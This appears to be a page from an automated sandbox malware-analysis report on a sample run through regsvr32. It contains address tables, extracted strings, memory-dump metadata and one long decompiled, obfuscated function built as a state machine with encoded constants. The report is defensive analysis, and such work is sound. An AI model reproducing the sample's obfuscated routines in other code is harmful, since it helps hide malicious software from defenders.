0x04b84644
0x04b84644
0x04b8427e
0x04b844d1
0x04b844dd
0x04b844e1
0x04b844ec
0x04b844f1
0x04b844fa
0x04b844fc
0x04b84500
0x04b8450e
0x04b84526
0x04b8452d
0x04b84534
0x04b84543
0x04b84551
0x04b8455c
0x04b8456a
0x04b84571
0x04b84579
0x04b845d3
0x04b845e3
0x04b845fb
0x04b8461b
0x04b84620
0x04b844c7
0x04b844c7
0x00000000
0x04b844c7
0x04b8428a
0x04b843f9
0x04b84405
0x04b8440c
0x04b84414
0x04b84419
0x04b84427
0x04b8442e
0x04b8447a
0x04b8448e
0x04b8449f
0x04b844bf
0x04b844c4
0x00000000
0x04b844c4
0x04b84292
0x04b84311
0x04b8431d
0x04b84321
0x04b84334
0x04b8433a
0x04b84349
0x04b8435e
0x04b8437e
0x04b843a9
0x04b843b2
0x04b843b7
0x04b843ba
0x04b843c1
0x04b843ca
0x04b843c3
0x04b843c5
0x04b843c7
0x04b843c7
0x04b843e7
0x04b843ec
0x00000000
0x04b843ec
0x04b84296
0x04b842e9
0x04b842ee
0x04b842ef
0x04b842f8
0x04b842fa
0x04b842fd
0x04b84302
0x04b84306
0x04b84309
0x00000000
0x04b84309
0x04b8429a
0x00000000
0x00000000
0x04b842b9
0x04b842c2
0x04b842cc
0x04b8472c
0x04b8472c
0x04b8472c
0x00000000
0x04b84738

Strings

!Sw, xrefs: 04B836F7
Vdd, xrefs: 04B8421A
)<L, xrefs: 04B83591
J', xrefs: 04B83627
sv, xrefs: 04B83A23
{, xrefs: 04B83570
c, xrefs: 04B8377B
R, xrefs: 04B83C0A
zj, xrefs: 04B83F4D
T9, xrefs: 04B83965
_EBM, xrefs: 04B83473
L, xrefs: 04B83D68
Et, xrefs: 04B83CE5

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !Sw$)<L$Et$L$R$T9$Vdd$_EBM$sv$zj$J'$c${
API String ID: 0-2179300830
Opcode ID: bd45b918defe92a9c7a16f7ef26ee8b57a75050385dc746ffcd22b0c8e5df722
Instruction ID: 7d209131b90eab3678a4fe8d0115994c9a4518d0400d07114ee16ab579e66b6e
Opcode Fuzzy Hash: bd45b918defe92a9c7a16f7ef26ee8b57a75050385dc746ffcd22b0c8e5df722
Instruction Fuzzy Hash: 7092ED711093819FE7B9CF25C58AB9FBBE1FBC4308F10891DE19A96260D7B19949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 04B967E6, Relevance: 17.0, Strings: 13, Instructions: 728
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04B967E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, signed int* _a28, signed int _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				intOrPtr _v4;
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _t846;
				intOrPtr _t847;
				signed int _t861;
				void* _t866;
				signed int _t867;
				signed int _t874;
				signed int* _t876;
				signed int _t885;
				void* _t937;
				signed int _t946;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				signed int _t968;
				signed int _t969;
				signed int _t970;
				signed int _t971;
				signed int _t972;
				signed int _t973;
				signed int _t974;
				signed int _t975;
				signed int _t976;
				signed int _t978;
				signed int _t980;
				signed int _t985;
				signed int _t986;
				signed int* _t989;
				void* _t991;

				_t876 = _a28;
				_push(_a48);
				_push(_a44);
				_v4 = __ecx;
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_t876);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B9FE29(_a20 & 0x0000ffff);
				_v304 = 0x84e682;
				_t989 =  &(( &_v304)[0xe]);
				_v304 = _v304 + 0xeb1b;
				_v304 = _v304 ^ 0x0f7f391c;
				_v304 = _v304 ^ 0x0ffae881;
				_t874 = 0;
				_v80 = 0xd03450;
				_t978 = 0x7e00160;
				_v80 = _v80 + 0x474c;
				_v80 = _v80 ^ 0x00d07b8f;
				_v40 = 0x62fb41;
				_v40 = _v40 ^ 0x58566629;
				_v40 = _v40 ^ 0x58349da0;
				_v56 = 0xe1b746;
				_v56 = _v56 + 0x8be3;
				_v56 = _v56 ^ 0x00e2c329;
				_v32 = 0xe6e4c5;
				_v32 = _v32 + 0xfb3f;
				_v32 = _v32 ^ 0x00e7a004;
				_v164 = 0x3535e2;
				_v164 = _v164 + 0xb15e;
				_v164 = _v164 + 0xffff4c2e;
				_v164 = _v164 ^ 0x0075336e;
				_v256 = 0xe056c0;
				_v256 = _v256 >> 0xf;
				_v12 = 0;
				_t960 = 0xf;
				_v256 = _v256 / _t960;
				_t961 = 0x75;
				_v256 = _v256 / _t961;
				_v256 = _v256 ^ 0x00040000;
				_v64 = 0xc12004;
				_v64 = _v64 | 0x05a7924d;
				_v64 = _v64 ^ 0x01e7b24d;
				_v200 = 0x3d9b4;
				_v200 = _v200 + 0xffffba05;
				_t962 = 0x4d;
				_v200 = _v200 / _t962;
				_v200 = _v200 >> 0xa;
				_v200 = _v200 ^ 0x00080002;
				_v264 = 0xdbb33c;
				_t963 = 0x21;
				_v264 = _v264 / _t963;
				_v264 = _v264 ^ 0x3bde5a68;
				_t964 = 0x74;
				_v264 = _v264 * 0x67;
				_v264 = _v264 ^ 0x14497559;
				_v172 = 0x2a3d0;
				_v172 = _v172 + 0xffff520a;
				_v172 = _v172 + 0xffffc196;
				_v172 = _v172 ^ 0x0001b670;
				_v16 = 0x40a0dc;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x8000040a;
				_v280 = 0x3a90ef;
				_v280 = _v280 + 0xfffff29b;
				_v280 = _v280 + 0xd15d;
				_v280 = _v280 + 0xffff2fb1;
				_v280 = _v280 ^ 0x003a8498;
				_v276 = 0x2b48bd;
				_v276 = _v276 * 0x59;
				_v276 = _v276 | 0x0b3e9c0e;
				_v276 = _v276 + 0x2f0e;
				_v276 = _v276 ^ 0x0f3f0c8c;
				_v244 = 0xf133cf;
				_v244 = _v244 * 0x50;
				_v244 = _v244 >> 0xe;
				_v244 = _v244 >> 2;
				_v244 = _v244 ^ 0x00004b7f;
				_v220 = 0x48bde3;
				_v220 = _v220 * 7;
				_v220 = _v220 << 3;
				_v220 = _v220 << 7;
				_v220 = _v220 ^ 0xf4c4d41f;
				_v152 = 0xdfcbbb;
				_v152 = _v152 / _t964;
				_v152 = _v152 ^ 0x15954f38;
				_v152 = _v152 ^ 0x1594a2df;
				_v236 = 0x79b2d;
				_v236 = _v236 + 0xffffa56f;
				_v236 = _v236 >> 0xc;
				_v236 = _v236 + 0xffff51ce;
				_v236 = _v236 ^ 0xffff5342;
				_v300 = 0x53b7c5;
				_v300 = _v300 | 0xbc55bbc8;
				_v300 = _v300 >> 0xb;
				_v300 = _v300 * 0x4a;
				_v300 = _v300 ^ 0x06ca0610;
				_v300 = 0x831a37;
				_v300 = _v300 >> 0xa;
				_v300 = _v300 ^ 0xf07c3cef;
				_v300 = _v300 >> 2;
				_v300 = _v300 ^ 0x3c15b978;
				_v296 = 0xbc94b;
				_v296 = _v296 ^ 0xc913797f;
				_v296 = _v296 ^ 0xc91ffb85;
				_v304 = 0xeb47f;
				_v304 = _v304 * 0x21;
				_v304 = _v304 >> 9;
				_v304 = _v304 ^ 0x00079d5b;
				_v296 = 0x863d92;
				_v296 = _v296 | 0xc3fe325e;
				_v296 = _v296 ^ 0xc3f15d89;
				_v304 = 0x8c9292;
				_v304 = _v304 * 0x65;
				_v304 = _v304 * 0x2f;
				_v304 = _v304 ^ 0x2ea0d0e4;
				_v296 = 0x7998c8;
				_v296 = _v296 * 0x1f;
				_v296 = _v296 ^ 0x0ebe6fc9;
				_v304 = 0xc13eda;
				_v304 = _v304 + 0x239b;
				_v304 = _v304 | 0x8aa80eb1;
				_v304 = _v304 ^ 0x8ae5aa52;
				_v304 = 0x2ac635;
				_t965 = 3;
				_v304 = _v304 * 0x1a;
				_v304 = _v304 | 0xa2ccc89a;
				_v304 = _v304 ^ 0xa6da26ac;
				_v296 = 0xd161a;
				_v296 = _v296 >> 0xb;
				_v296 = _v296 ^ 0x00086437;
				_v300 = 0xc8d906;
				_v300 = _v300 << 5;
				_v300 = _v300 / _t965;
				_v300 = _v300 | 0xd3e5db7e;
				_v300 = _v300 ^ 0xdbffc0c3;
				_v304 = 0xa90eaa;
				_t966 = 0x62;
				_v304 = _v304 / _t966;
				_v304 = _v304 ^ 0xa321830c;
				_v304 = _v304 ^ 0xa32eb72c;
				_v296 = 0xc9c90e;
				_v296 = _v296 ^ 0x29ac5136;
				_v296 = _v296 ^ 0x296c2187;
				_v168 = 0xb8ba74;
				_v168 = _v168 >> 0xb;
				_v168 = _v168 | 0xd39b7801;
				_v168 = _v168 ^ 0xd39a1a13;
				_v240 = 0xce03d4;
				_v240 = _v240 + 0xffff6ba1;
				_v240 = _v240 + 0xffff3730;
				_t967 = 0x7e;
				_v240 = _v240 / _t967;
				_v240 = _v240 ^ 0x00015c8a;
				_v144 = 0x76dd98;
				_v144 = _v144 << 0xa;
				_t968 = 0xb;
				_v144 = _v144 / _t968;
				_v144 = _v144 ^ 0x13f9c089;
				_v88 = 0xd6758c;
				_t969 = 0x7c;
				_v88 = _v88 * 0x7d;
				_v88 = _v88 ^ 0x68b07bf0;
				_v112 = 0x136ce2;
				_v112 = _v112 * 0x7a;
				_v112 = _v112 ^ 0x094e8b6c;
				_v160 = 0xc781f4;
				_v160 = _v160 + 0x7b6;
				_v160 = _v160 ^ 0xd2a6870e;
				_v160 = _v160 ^ 0xd267b3cc;
				_v216 = 0x3cec52;
				_v216 = _v216 / _t969;
				_v216 = _v216 + 0xe7c2;
				_v216 = _v216 + 0x185f;
				_v216 = _v216 ^ 0x00083478;
				_v128 = 0xe8ace2;
				_v128 = _v128 + 0xffff5a4b;
				_v128 = _v128 >> 5;
				_v128 = _v128 ^ 0x00080537;
				_v20 = 0xba5f1f;
				_t970 = 0x28;
				_v20 = _v20 / _t970;
				_v20 = _v20 ^ 0x00097bc9;
				_v184 = 0x868bed;
				_v184 = _v184 ^ 0x5d9bbcc4;
				_t971 = 0x15;
				_t985 = 0x61;
				_v184 = _v184 * 0x7e;
				_v184 = _v184 ^ 0xd4635941;
				_v248 = 0xc6bb26;
				_v248 = _v248 + 0x4226;
				_v248 = _v248 + 0x1eaa;
				_v248 = _v248 + 0x143f;
				_v248 = _v248 ^ 0x00cd4d4f;
				_v124 = 0x1449aa;
				_v124 = _v124 >> 7;
				_v124 = _v124 + 0xffff4698;
				_v124 = _v124 ^ 0xfffccf45;
				_v204 = 0xd9ae2a;
				_v204 = _v204 * 0x25;
				_v204 = _v204 | 0x41acc33e;
				_v204 = _v204 + 0xe9b9;
				_v204 = _v204 ^ 0x5ff1a5de;
				_v104 = 0x27630a;
				_v104 = _v104 | 0x34992b3f;
				_v104 = _v104 ^ 0x34bda39f;
				_v28 = 0xa04064;
				_v28 = _v28 | 0x72e9e7d8;
				_v28 = _v28 ^ 0x72e1f0ab;
				_v48 = 0xc4ba01;
				_v48 = _v48 << 7;
				_v48 = _v48 ^ 0x6259539c;
				_v180 = 0x3340f4;
				_v180 = _v180 | 0x3035b2e2;
				_v180 = _v180 << 9;
				_v180 = _v180 ^ 0x6feb3ded;
				_v232 = 0x2e047a;
				_v232 = _v232 >> 0xa;
				_v232 = _v232 * 0x12;
				_v232 = _v232 / _t971;
				_v232 = _v232 ^ 0x0002c217;
				_v72 = 0x299f12;
				_v72 = _v72 << 3;
				_v72 = _v72 ^ 0x0148e07c;
				_v188 = 0xf414db;
				_v188 = _v188 << 0x10;
				_v188 = _v188 / _t985;
				_v188 = _v188 ^ 0x003bf194;
				_v156 = 0xc18fa7;
				_t986 = 0x6b;
				_v156 = _v156 / _t986;
				_t972 = 0xc;
				_v156 = _v156 / _t972;
				_v156 = _v156 ^ 0x0009860f;
				_v208 = 0xbb24e8;
				_v208 = _v208 + 0xd4bb;
				_v208 = _v208 + 0xffffec33;
				_t973 = 0x26;
				_v208 = _v208 / _t973;
				_v208 = _v208 ^ 0x000d494f;
				_v92 = 0xf4dbce;
				_v92 = _v92 + 0x5ee7;
				_v92 = _v92 ^ 0x00f22c8f;
				_v100 = 0x7239d1;
				_v100 = _v100 | 0x01f5add3;
				_v100 = _v100 ^ 0x01f71b27;
				_v292 = 0x4b72c4;
				_t974 = 0x61;
				_v292 = _v292 * 0xb;
				_v292 = _v292 + 0xfffff18f;
				_v292 = _v292 * 0xc;
				_v292 = _v292 ^ 0x26e66304;
				_v224 = 0xeae701;
				_v224 = _v224 << 1;
				_v224 = _v224 << 6;
				_v224 = _v224 | 0xd938d457;
				_v224 = _v224 ^ 0xfd70504c;
				_v108 = 0xa91a4c;
				_v108 = _v108 << 2;
				_v108 = _v108 ^ 0x02a24d10;
				_v68 = 0x46e95;
				_v68 = _v68 ^ 0x636abfcf;
				_v68 = _v68 ^ 0x636edf46;
				_v76 = 0x93e843;
				_v76 = _v76 | 0xba39a6db;
				_v76 = _v76 ^ 0xbaba9d8f;
				_v84 = 0xd50ea2;
				_v84 = _v84 | 0x50ec9d25;
				_v84 = _v84 ^ 0x50f8ba70;
				_v288 = 0x52484f;
				_v288 = _v288 + 0xb430;
				_v288 = _v288 * 0x4c;
				_v288 = _v288 >> 0xb;
				_v288 = _v288 ^ 0x000d4af8;
				_v284 = 0x2da3fa;
				_v284 = _v284 | 0xb3c63afe;
				_v284 = _v284 ^ 0xfce0d7d7;
				_v284 = _v284 + 0xffff4c41;
				_v284 = _v284 ^ 0x4f0e5b87;
				_v52 = 0xe252ad;
				_v52 = _v52 | 0x3c4f00b6;
				_v52 = _v52 ^ 0x3cecbbb2;
				_v60 = 0xab577e;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0x55a8aa1a;
				_v148 = 0x5c065f;
				_v148 = _v148 << 0x10;
				_v148 = _v148 / _t986;
				_v148 = _v148 ^ 0x00079968;
				_v252 = 0xfb0d10;
				_v252 = _v252 / _t974;
				_v252 = _v252 << 0x10;
				_v252 = _v252 ^ 0x25f2b671;
				_v252 = _v252 ^ 0xb36c8d69;
				_v260 = 0x776100;
				_v260 = _v260 >> 0x10;
				_v260 = _v260 | 0xe8d0a90c;
				_v260 = _v260 * 0x14;
				_v260 = _v260 ^ 0x304a111f;
				_v268 = 0x4079f3;
				_v268 = _v268 >> 4;
				_t975 = 0x4f;
				_v268 = _v268 * 0x5f;
				_v268 = _v268 + 0x21c5;
				_v268 = _v268 ^ 0x017b7447;
				_v44 = 0x101fed;
				_v44 = _v44 ^ 0x1e85c214;
				_v44 = _v44 ^ 0x1e9d5cc7;
				_v140 = 0xb56248;
				_v140 = _v140 >> 0xb;
				_v140 = _v140 ^ 0xb0648700;
				_v140 = _v140 ^ 0xb06b52ff;
				_v228 = 0x5d2032;
				_v228 = _v228 + 0xe696;
				_v228 = _v228 + 0x90e;
				_v228 = _v228 << 6;
				_v228 = _v228 ^ 0x178d1a7f;
				_v192 = 0x46faa8;
				_v192 = _v192 / _t975;
				_v192 = _v192 + 0x59ff;
				_v192 = _v192 ^ 0x00002efb;
				_v272 = 0x13fbcb;
				_v272 = _v272 + 0xffff66dd;
				_v272 = _v272 * 0x5d;
				_v272 = _v272 + 0xffff70cc;
				_v272 = _v272 ^ 0x070467b9;
				_v136 = 0xda75c;
				_v136 = _v136 << 0xe;
				_v136 = _v136 << 8;
				_v136 = _v136 ^ 0xd703a46a;
				_v24 = 0x98e6;
				_v24 = _v24 | 0x30837cf6;
				_v24 = _v24 ^ 0x308cf6e6;
				_v196 = 0x2348e5;
				_v196 = _v196 + 0xec0b;
				_v196 = _v196 + 0xffff4f76;
				_v196 = _v196 + 0xffff4b3e;
				_v196 = _v196 ^ 0x002962b3;
				_v176 = 0x7bcaf7;
				_v176 = _v176 * 0x37;
				_v176 = _v176 << 4;
				_v176 = _v176 ^ 0xa986161e;
				_v120 = 0x3fa34;
				_v120 = _v120 * 0x49;
				_v120 = _v120 >> 7;
				_v120 = _v120 ^ 0x00066829;
				_v116 = 0x9c5c94;
				_v116 = _v116 + 0x20fd;
				_v116 = _v116 >> 2;
				_v116 = _v116 ^ 0x0025da20;
				_v212 = 0x6b8402;
				_v212 = _v212 + 0x9bc6;
				_v212 = _v212 * 0x74;
				_v212 = _v212 + 0xe621;
				_v212 = _v212 ^ 0x30fe6560;
				_v96 = 0xbe9741;
				_v96 = _v96 + 0xffffd77c;
				_v96 = _v96 ^ 0x00bbad9c;
				_v304 = 0xe465cf;
				_v304 = _v304 >> 4;
				_v304 = _v304 << 5;
				_v304 = _v304 ^ 0x01c3ad6d;
				_v296 = 0xc47264;
				_v296 = _v296 << 0xc;
				_v296 = _v296 ^ 0x4720cdbf;
				_v132 = 0x7ca780;
				_v132 = _v132 + 0xa093;
				_v132 = _v132 << 7;
				_v132 = _v132 ^ 0x3ea11d20;
				_t976 = _v8;
				_t987 = _v8;
				while(1) {
					L1:
					_t937 = 0xd154a5a;
					while(1) {
						_t846 = _v300;
						while(1) {
							L3:
							_t991 = _t978 - 0x7e00160;
							if(_t991 > 0) {
								break;
							}
							if(_t991 == 0) {
								_t978 = 0xfd2ad77;
								continue;
							} else {
								if(_t978 == 0x1a1d1c) {
									__eflags = E04B84BFC(_t976, _a16);
									_t978 = 0x6a5d586;
									_t866 = 1;
									_t874 =  !=  ? _t866 : _t874;
									goto L13;
								} else {
									if(_t978 == 0x352276a) {
										_t867 = E04B8DDA9(_v168, _t876, _v280, _t876, _v240, _v144, _t876, _v88, _v112);
										_t987 = _t867;
										__eflags = _t867;
										_t978 =  !=  ? 0x6fee97d : 0xb1727d5;
										E04BA2B09(_v160, 0, _v216, _v128);
										_t989 =  &(_t989[0xa]);
										L39:
										_t876 = _a28;
										_t937 = 0xd154a5a;
										goto L40;
									} else {
										if(_t978 == 0x6a5d586) {
											E04B9E358(_v196, _v176, _t976, _v120);
											_t978 = 0x6d75a8e;
											goto L12;
										} else {
											if(_t978 == 0x6d75a8e) {
												E04B9E358(_v116, _v212, _t846, _v96);
												_t978 = 0xedc04fb;
												L12:
												L13:
												_t876 = _a28;
												goto L1;
											} else {
												if(_t978 != 0x6fee97d) {
													L40:
													__eflags = _t978 - 0xb1727d5;
													if(_t978 != 0xb1727d5) {
														_t846 = _v300;
														continue;
													}
												} else {
													_t846 = E04B8ED66(_v20, _v184, _t987, _v248, _v124, _v152, _v204, _a40, _t876, _v104, _a20, _t876, _v28, _v48);
													_t876 = _a28;
													_t989 =  &(_t989[0xe]);
													_v300 = _t846;
													_t937 = 0xd154a5a;
													_t978 =  !=  ? 0xd154a5a : 0xedc04fb;
													continue;
												}
											}
										}
									}
								}
							}
							L43:
							return _t874;
						}
						__eflags = _t978 - _t937;
						if(_t978 == _t937) {
							__eflags =  *_t876;
							if(__eflags == 0) {
								_t847 = _v12;
							} else {
								_push(_v188);
								_push(_v72);
								_push(_v232);
								_t847 = E04B9E1F8(0x4b81a0c, _v180, __eflags);
								_t989 =  &(_t989[3]);
								_v12 = _t847;
							}
							_t946 = _v16 | _v172 | _v264 | _v200 | _v64 | _v256 | _v164 | _v32 | _v56;
							_t980 = _a32 & 1;
							__eflags = _t980;
							if(_t980 != 0) {
								__eflags = _t946;
							}
							_t976 = E04B84A88(1, _t946, _a48, _v156, 1, _t847, 1, _v208, _v92, _v300, _v100, _v292, _v224, 1, _v108);
							E04B9FECB(_v12, _v68, _v76, _v84, _v288);
							_t989 =  &(_t989[0x10]);
							__eflags = _t976;
							if(_t976 == 0) {
								_t978 = 0x6d75a8e;
								goto L39;
							} else {
								_v36 = 1;
								E04BA3E0E(_v276,  &_v36, _v284, _v52, _v60, 4, _t976);
								_t989 =  &(_t989[5]);
								__eflags = _t980;
								if(_t980 != 0) {
									E04B9C8CF( &_v36, _t976,  &_v8, _v148, _v244, _v252, _v260, _v268);
									_t769 =  &_v36;
									 *_t769 = _v36 | _v236;
									__eflags =  *_t769;
									E04BA3E0E(_v220,  &_v36, _v44, _v140, _v228, _v8, _t976);
									_t989 =  &(_t989[0xb]);
								}
								_t978 = 0xf81d281;
								goto L13;
							}
						} else {
							__eflags = _t978 - 0xdd5f83a;
							if(__eflags == 0) {
								__eflags = E04B8EF0C(_t976, _v80, __eflags) - _v40;
								_t978 =  ==  ? 0x1a1d1c : 0x6a5d586;
								goto L13;
							} else {
								__eflags = _t978 - 0xedc04fb;
								if(_t978 == 0xedc04fb) {
									E04B9E358(_v304, _v296, _t987, _v132);
								} else {
									__eflags = _t978 - 0xf81d281;
									if(_t978 == 0xf81d281) {
										_t885 =  *_t876;
										__eflags = _t885;
										if(_t885 == 0) {
											_t861 = 0;
											__eflags = 0;
										} else {
											_t861 = _a28[1];
										}
										_push(_t885);
										E04BA10DC(_t976, _v192, _v4, _t885, _v272, _v136, _v24, _t861);
										_t989 =  &(_t989[7]);
										asm("sbb esi, esi");
										_t978 = (_t978 & 0x073022b4) + 0x6a5d586;
										goto L13;
									} else {
										__eflags = _t978 - 0xfd2ad77;
										if(_t978 != 0xfd2ad77) {
											goto L40;
										} else {
											_t978 = 0x352276a;
											goto L3;
										}
									}
								}
							}
						}
						goto L43;
					}
				}
			}

0x04b967f8
0x04b96800
0x04b9680a
0x04b96811
0x04b96818
0x04b9681f
0x04b96826
0x04b9682d
0x04b9682e
0x04b96835
0x04b96836
0x04b9683d
0x04b96844
0x04b9684b
0x04b96852
0x04b96853
0x04b96854
0x04b96859
0x04b96861
0x04b96864
0x04b9686e
0x04b96878
0x04b96880
0x04b96882
0x04b9688d
0x04b96892
0x04b9689d
0x04b968a8
0x04b968b3
0x04b968be
0x04b968c9
0x04b968d4
0x04b968df
0x04b968ea
0x04b968f5
0x04b96900
0x04b9690b
0x04b96916
0x04b96921
0x04b9692c
0x04b96937
0x04b9693f
0x04b96944
0x04b96951
0x04b96956
0x04b96960
0x04b96965
0x04b9696b
0x04b96973
0x04b9697e
0x04b96989
0x04b96994
0x04b9699c
0x04b969a8
0x04b969ad
0x04b969b1
0x04b969b6
0x04b969c0
0x04b969cc
0x04b969d1
0x04b969d7
0x04b969e4
0x04b969e5
0x04b969e9
0x04b969f1
0x04b969fc
0x04b96a07
0x04b96a12
0x04b96a1d
0x04b96a28
0x04b96a30
0x04b96a3b
0x04b96a43
0x04b96a4b
0x04b96a53
0x04b96a5b
0x04b96a63
0x04b96a70
0x04b96a74
0x04b96a7c
0x04b96a84
0x04b96a8c
0x04b96a99
0x04b96a9d
0x04b96aa2
0x04b96aa7
0x04b96aaf
0x04b96abc
0x04b96ac0
0x04b96ac5
0x04b96aca
0x04b96ad2
0x04b96ae6
0x04b96aed
0x04b96af8
0x04b96b03
0x04b96b0b
0x04b96b13
0x04b96b18
0x04b96b20
0x04b96b28
0x04b96b30
0x04b96b38
0x04b96b42
0x04b96b46
0x04b96b4e
0x04b96b56
0x04b96b5b
0x04b96b63
0x04b96b68
0x04b96b70
0x04b96b78
0x04b96b80
0x04b96b88
0x04b96b95
0x04b96b99
0x04b96b9e
0x04b96ba6
0x04b96bae
0x04b96bb6
0x04b96bbe
0x04b96bcb
0x04b96bd4
0x04b96bd8
0x04b96be0
0x04b96bed
0x04b96bf3
0x04b96bfb
0x04b96c03
0x04b96c0b
0x04b96c13
0x04b96c1b
0x04b96c2a
0x04b96c2d
0x04b96c31
0x04b96c39
0x04b96c41
0x04b96c49
0x04b96c4e
0x04b96c56
0x04b96c5e
0x04b96c6b
0x04b96c6f
0x04b96c77
0x04b96c7f
0x04b96c8b
0x04b96c90
0x04b96c96
0x04b96c9e
0x04b96ca6
0x04b96cae
0x04b96cb6
0x04b96cbe
0x04b96cc9
0x04b96cd1
0x04b96cdc
0x04b96ce7
0x04b96cef
0x04b96cf7
0x04b96d03
0x04b96d08
0x04b96d0e
0x04b96d16
0x04b96d21
0x04b96d30
0x04b96d35
0x04b96d3e
0x04b96d49
0x04b96d5c
0x04b96d5d
0x04b96d64
0x04b96d6f
0x04b96d82
0x04b96d89
0x04b96d94
0x04b96d9f
0x04b96daa
0x04b96db5
0x04b96dc0
0x04b96dce
0x04b96dd2
0x04b96dda
0x04b96de2
0x04b96dea
0x04b96df7
0x04b96e02
0x04b96e0a
0x04b96e15
0x04b96e29
0x04b96e2e
0x04b96e37
0x04b96e42
0x04b96e4d
0x04b96e60
0x04b96e63
0x04b96e66
0x04b96e6d
0x04b96e78
0x04b96e80
0x04b96e88
0x04b96e90
0x04b96e98
0x04b96ea0
0x04b96eab
0x04b96eb3
0x04b96ebe
0x04b96ec9
0x04b96ed6
0x04b96eda
0x04b96ee2
0x04b96eea
0x04b96ef2
0x04b96efd
0x04b96f08
0x04b96f13
0x04b96f1e
0x04b96f29
0x04b96f34
0x04b96f3f
0x04b96f47
0x04b96f52
0x04b96f5d
0x04b96f68
0x04b96f70
0x04b96f7b
0x04b96f83
0x04b96f8d
0x04b96f99
0x04b96f9d
0x04b96fa5
0x04b96fb0
0x04b96fb8
0x04b96fc3
0x04b96fce
0x04b96fe1
0x04b96fe8
0x04b96ff3
0x04b97005
0x04b9700a
0x04b9701a
0x04b9701d
0x04b97024
0x04b97031
0x04b97039
0x04b97041
0x04b9704f
0x04b97054
0x04b97058
0x04b97060
0x04b9706b
0x04b97076
0x04b97081
0x04b9708c
0x04b97097
0x04b970a2
0x04b970b1
0x04b970b2
0x04b970b6
0x04b970c3
0x04b970c7
0x04b970cf
0x04b970d7
0x04b970db
0x04b970e0
0x04b970e8
0x04b970f0
0x04b970fb
0x04b97103
0x04b9710e
0x04b97119
0x04b97124
0x04b9712f
0x04b9713a
0x04b97145
0x04b97150
0x04b9715b
0x04b97166
0x04b97171
0x04b97179
0x04b97186
0x04b9718a
0x04b9718f
0x04b97197
0x04b9719f
0x04b971a7
0x04b971af
0x04b971b7
0x04b971bf
0x04b971ca
0x04b971d5
0x04b971e0
0x04b971eb
0x04b971f3
0x04b971fe
0x04b97209
0x04b9721c
0x04b97223
0x04b9722e
0x04b9723c
0x04b97240
0x04b97245
0x04b9724d
0x04b97255
0x04b9725d
0x04b97262
0x04b9726f
0x04b97273
0x04b9727b
0x04b97285
0x04b97291
0x04b97292
0x04b97296
0x04b9729e
0x04b972a6
0x04b972b1
0x04b972bc
0x04b972c7
0x04b972d2
0x04b972da
0x04b972e5
0x04b972f0
0x04b972f8
0x04b97300
0x04b97308
0x04b9730d
0x04b97315
0x04b97329
0x04b97330
0x04b9733b
0x04b97346
0x04b9734e
0x04b9735b
0x04b9735f
0x04b97367
0x04b9736f
0x04b9737a
0x04b97382
0x04b9738a
0x04b97395
0x04b973a0
0x04b973ab
0x04b973b6
0x04b973be
0x04b973c6
0x04b973ce
0x04b973d6
0x04b973de
0x04b973f1
0x04b973f8
0x04b97400
0x04b9740b
0x04b9741e
0x04b97425
0x04b9742d
0x04b97438
0x04b97443
0x04b9744e
0x04b97456
0x04b97461
0x04b97469
0x04b97476
0x04b9747a
0x04b97482
0x04b9748a
0x04b97495
0x04b974a0
0x04b974ab
0x04b974b3
0x04b974b8
0x04b974bd
0x04b974c5
0x04b974cd
0x04b974d2
0x04b974da
0x04b974e5
0x04b974f0
0x04b974f8
0x04b97503
0x04b9750a
0x04b97511
0x04b97511
0x04b97511
0x04b97516
0x04b97516
0x04b9751a
0x04b9751a
0x04b9751a
0x04b97520
0x00000000
0x00000000
0x04b97526
0x04b976ab
0x00000000
0x04b9752c
0x04b97532
0x04b97699
0x04b9769b
0x04b976a2
0x04b976a3
0x00000000
0x04b97538
0x04b9753e
0x04b97651
0x04b9765d
0x04b97672
0x04b97679
0x04b9767e
0x04b97683
0x04b97915
0x04b97915
0x04b9791c
0x00000000
0x04b97544
0x04b9754a
0x04b9761e
0x04b97623
0x00000000
0x04b97550
0x04b97556
0x04b975f0
0x04b975f5
0x04b975fa
0x04b975fc
0x04b975fc
0x00000000
0x04b9755c
0x04b97563
0x04b97921
